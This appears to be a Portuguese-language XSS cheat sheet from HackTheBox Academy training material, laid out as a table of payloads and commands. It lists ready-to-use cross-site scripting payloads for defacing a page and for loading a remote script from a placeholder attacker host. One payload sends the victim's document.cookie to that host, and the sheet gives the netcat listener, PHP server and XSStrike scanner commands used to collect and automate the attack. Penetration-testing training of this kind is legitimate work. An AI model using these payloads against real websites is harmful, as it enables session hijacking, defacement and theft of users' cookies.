Cheat Sheet

Código

Descrição

Cargas XSS

<script>alert(window.origin)</script>

Carga útil XSS básica

<plaintext>

Carga útil XSS básica

<script>print()</script>

Carga útil XSS básica

<img src="" onerror=alert(window.origin)>

Carga útil XSS baseada em HTML

<script>document.body.style.background = "#141d2b"</script>

Alterar cor de fundo

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Alterar imagem de fundo

<script>document.title = 'HackTheBox Academy'</script>

Alterar o título do site

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Substituir o corpo principal do site

<script>document.getElementById('urlform').remove();</script>

Remover determinado elemento HTML

<script src="http://OUR_IP/script.js"></script>

Carregar script remoto

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Envie detalhes do cookie para nós

Comandos

Descrição

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Execute xsstrikeem um parâmetro de URL

sudo nc -lvnp 80

Iniciar netcatouvinte

sudo php -S 0.0.0.0:80

Iniciar PHPservidor

Last updated 10 months ago